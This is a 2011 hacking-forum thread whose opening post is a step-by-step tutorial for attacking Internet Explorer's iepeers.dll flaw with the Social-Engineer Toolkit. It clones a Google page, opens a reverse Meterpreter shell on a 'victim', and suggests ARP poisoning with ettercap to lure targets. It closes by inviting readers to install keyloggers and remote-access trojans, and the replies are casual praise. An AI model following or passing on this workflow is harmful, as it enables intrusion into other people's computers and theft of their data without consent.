Sinisterly
Internet explorer vuln iepeers.dll (HOW TO) - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Computers (https://sinister.li/Forum-Computers)
+--- Forum: Operating Systems (https://sinister.li/Forum-Operating-Systems)
+--- Thread: Internet explorer vuln iepeers.dll (HOW TO) (/Thread-Internet-explorer-vuln-iepeers-dll-HOW-TO)

Pages: 1 2


Internet explorer vuln iepeers.dll (HOW TO) - Enc0de - 04-05-2011

Microsoft Internet Explorer iepeers.dll Expl0it.
Just for 1llusion


This tutorial was made using SET in backtrack 4 r2

You can also find this tutorial on by blog just click on my signature or here and it'll take you there like magic.

Okay first of all let's browse to our SET directory and run it.

Quote:cd /pentest/exploit/SET
./set

Sorry there is a picture here but I'm limited to 10 pics a post if you want to see it click here.

Now we want option 2 Website Attack Vectors.

[Image: 2.png]

Now I know they all look like fun but let's just stick to the one we want or I will not stop writing about all of them. They will get their turn in my up coming posts.

For now choose option 2 The Metasploit Browser Exploit Method.

[Image: 3.png]

Now use option 1 Web Templates.

[Image: 4.png]

Now pick the website of your choice I'm going for google option 2.

[Image: 5.png]

Now lets pick the exploit we want to use witch is option 8 iepeers.dll you can play with other exploits if you want and see witch one works for you the best.

[Image: 6.png]

Now option 2 Reverse Meterpreter.. After this is will ask you what port do you want to use just leave it black and press enter.

[Image: 7.png]

Now MSF will load but we are not done we need to change some of the options so once it says Server Started press enter and type in jobs and then kill it like this.

Quote:jobs
kill 0

[Image: 8.png]

Now you need to know you local IP adress you can do this with the ifconfig. Okay so once you know it lets put it in.

Quote:set srvhost 192.168.0.1 [your_IP]
set lhost 192.168.0.1 [your_IP]

then run it

Quote:exploit -j

[Image: 9.png]

Now everything is ready for the victim to connect.But getting him to connect is up to you I would normally just ARP Poison the network with ettercap's dns spoof plugin. but for now I'm just going to browse to it manually because my connection isn't bridged in VMWare.

Sorry there was a picture here but I'm limited to 10 pics per post so if you want to see it click here


Now take a good look at the picture below do you see where it says Meterpreter session 1 opened thats a good sign that means we are in wait a bit till you see New server process: notepad.exe then press enter and type in sessions -l to list the sessions that are open and once you see one type in sessions -i witch is interact with sessions and put the sessions ID number where in my case is 1

Quote:sessions -l
sessions -i 1

[Image: 11.png]

Once in type in ipconfig to check the victim ip.
ifconfig

[Image: 12.png]

And thats it your in know you can upload your keyloggers and RAT and have fun ^_^.



RE: Internet explorer vuln iepeers.dll (HOW TO) - darkscorpion - 04-05-2011

wow I have alway wanted to learn how to use backtrack but I never had the chance. Smile


RE: Internet explorer vuln iepeers.dll (HOW TO) - Enc0de - 04-05-2011

(04-05-2011, 04:37 PM)darkscorpion Wrote: wow I have alway wanted to learn how to use backtrack but I never had the chance. Smile

Hey try it out and if you need anythong just add me on yahoo, or if you just want to talk about it. Don't be shy
(04-05-2011, 04:40 PM)The 7th Sage Wrote: Awesome guide mate.

Hey can you please give me permission to post more than 10 pics on a tutorial.

Help me help you. ^_^


RE: Internet explorer vuln iepeers.dll (HOW TO) - Enc0de - 04-05-2011

(04-05-2011, 04:45 PM)The 7th Sage Wrote: been increased to 20 for everyone now. Always wanted to increase it but forgot.

Thanks sage


RE: Internet explorer vuln iepeers.dll (HOW TO) - darkscorpion - 04-05-2011

ok I will talk to you this week end. Smile


RE: Internet explorer vuln iepeers.dll (HOW TO) - Enc0de - 04-05-2011

(04-05-2011, 04:48 PM)darkscorpion Wrote: ok I will talk to you this week end. Smile

Google talk or yahoo??


RE: Internet explorer vuln iepeers.dll (HOW TO) - 1llusion - 04-05-2011

Awesome guide!!!! Bought a new flashdrive to dedicate only to BT Tongue


Thanks!!!!


RE: Internet explorer vuln iepeers.dll (HOW TO) - Enc0de - 04-05-2011

(04-05-2011, 06:57 PM)1llusion Wrote: Awesome guide!!!! Bought a new flashdrive to dedicate only to BT Tongue


Thanks!!!!

Are you going to be using as a live USB??


RE: Internet explorer vuln iepeers.dll (HOW TO) - 1llusion - 04-05-2011

(04-05-2011, 06:59 PM)enc0de Wrote:
(04-05-2011, 06:57 PM)1llusion Wrote: Awesome guide!!!! Bought a new flashdrive to dedicate only to BT Tongue


Thanks!!!!

Are you going to be using as a live USB??

possibly Smile why?


RE: Internet explorer vuln iepeers.dll (HOW TO) - Enc0de - 04-05-2011

(04-05-2011, 07:03 PM)1llusion Wrote:
(04-05-2011, 06:59 PM)enc0de Wrote:
(04-05-2011, 06:57 PM)1llusion Wrote: Awesome guide!!!! Bought a new flashdrive to dedicate only to BT Tongue


Thanks!!!!

Are you going to be using as a live USB??

possibly Smile why?

Just wondering? it's better if you dual boot